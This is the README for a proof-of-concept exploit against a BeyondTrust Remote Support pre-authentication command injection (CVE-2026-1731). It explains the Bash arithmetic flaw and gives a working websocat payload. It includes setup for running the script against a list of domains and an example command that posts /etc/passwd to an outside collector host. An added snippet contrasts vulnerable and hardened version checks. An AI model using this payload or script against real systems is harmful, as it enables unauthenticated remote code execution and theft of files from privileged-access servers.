Bipin Jitiya b2cff2b6f3 Timeout added
2026-02-11 18:16:14 +05:30

CVE-2026-1731 BeyondTrust Remote Support Pre-Auth RCE PoC

Warning

This script is intended for educational and research purposes only. Do not use it against systems without explicit permission. Unauthorized access or testing is illegal and unethical. Read the full DISCLAIMER before using this script.

Overview

This script demonstrates a critical command injection vulnerability (CVE-2026-1731) affecting BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The issue originates from the same WebSocket-reachable endpoint involved in the earlier high-profile CVE-2024-12356, making this a closely related variant.

The vulnerability exists because the server's thin-scc-wrapper script performs arithmetic comparisons on attacker-controlled input, specifically the remoteVersion value sent during the WebSocket handshake. In an arithmetic context, Bash evaluates each operand as an expression rather than a plain string, and an array subscript inside that expression undergoes command substitution. This allows crafted payloads like a[$(cmd)]0 to trigger arbitrary command execution during evaluation.

Even though BeyondTrust added a numeric sanity check in this patch cycle, it does not prevent Bash from performing expression evaluation later, leaving the endpoint exploitable. Attackers can gain code execution simply by opening a WebSocket connection and sending a malicious version value before authentication.
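
The evaluation behaviour described above, as an added example that is not part of the original README and is not BeyondTrust's code: a Bash version check in its weak form (arithmetic comparison on the raw string) beside a hardened form that matches the string against a digit-only pattern before any arithmetic context. The function names, MIN_VERSION and the harmless temp-file command are assumptions made for the illustration.

```bash
#!/usr/bin/env bash
# Added illustration of the bug class; not BeyondTrust's thin-scc-wrapper code.
# Function names and MIN_VERSION are hypothetical.
[ -n "${BASH_VERSION:-}" ] || exec bash "$0" "$@"   # [[ ]] and (( )) need bash

MIN_VERSION=1

# Weak: -ge inside [[ ]] evaluates each operand as an arithmetic expression.
# An operand such as name[$(cmd)] has its subscript expanded, which runs cmd.
weak_version_check() {
    local remote_version=$1
    [[ "$remote_version" -ge "$MIN_VERSION" ]] 2>/dev/null
}

# Hardened: match the raw string against a strict digit pattern first, so
# nothing but [0-9] ever reaches an arithmetic context. 10# forces base 10
# (otherwise "08" is parsed as invalid octal).
safe_version_check() {
    local remote_version=$1
    [[ "$remote_version" =~ ^[0-9]{1,9}$ ]] || return 2   # reject, never evaluate
    (( 10#$remote_version >= MIN_VERSION ))
}

# Constructed input: same shape as the page's a[$(cmd)]0 payload, with a
# harmless local side effect (creating an empty temp file) as the command.
demo() {
    local marker crafted
    marker=$(mktemp -u)
    crafted="a[\$(touch $marker)]0"

    weak_version_check "$crafted" || true
    if [ -e "$marker" ]; then echo "weak check: substitution executed"; fi
    rm -f "$marker"

    if safe_version_check "$crafted"; then echo "safe check: accepted (unexpected)"
    else echo "safe check: rejected (status $?)"; fi
    if [ -e "$marker" ]; then echo "safe check: substitution executed (unexpected)"; fi
    rm -f "$marker"
}
demo
```

The same rule applies to every arithmetic context in Bash ((( )), $(( )), let, array indices and the numeric operators of [[ ]]), so the string validation has to happen before the value reaches any of them.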

Payload

echo -ne "hax[\$(ATTACKER-COMMAND)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | \
./websocat -k wss://AFFECTED-SYSTEM:443/nw \
--protocol "ingredi support desk customer thin" \
-H "X-Ns-Company: COMPANY-NAME" \
--binary -n -

Dependencies

pip3 install requests

Download websocat

wget -O websocat https://github.com/vi/websocat/releases/download/v1.14.1/websocat.x86_64-unknown-linux-musl
chmod +x websocat

(Place it in the same folder as your Python script.)

Or move it system-wide:

sudo mv websocat /usr/local/bin/

Create domains.txt in the same directory

Add the URLs you want to test:

example1.com
example2.com
example3.com

Script Usage

Edit the following line in the script to configure the command you want the WebSocket exploit to execute:

CMD = "YOUR-COMMAND-HERE"

For example:

CMD = "curl -X POST -d @/etc/passwd http://XXXXXXXXX.oast.fun/"

Once the command is set, run the script:

python3 exploit.py

Or make it executable and run it directly:

chmod +x exploit.py
./exploit.py

Mitigation

Reference

Description
CVE-2026-1731 - Critical command injection vulnerability in BeyondTrust Remote Support and Privileged Remote Access due to unsafe Bash arithmetic evaluation in a WebSocket-reachable script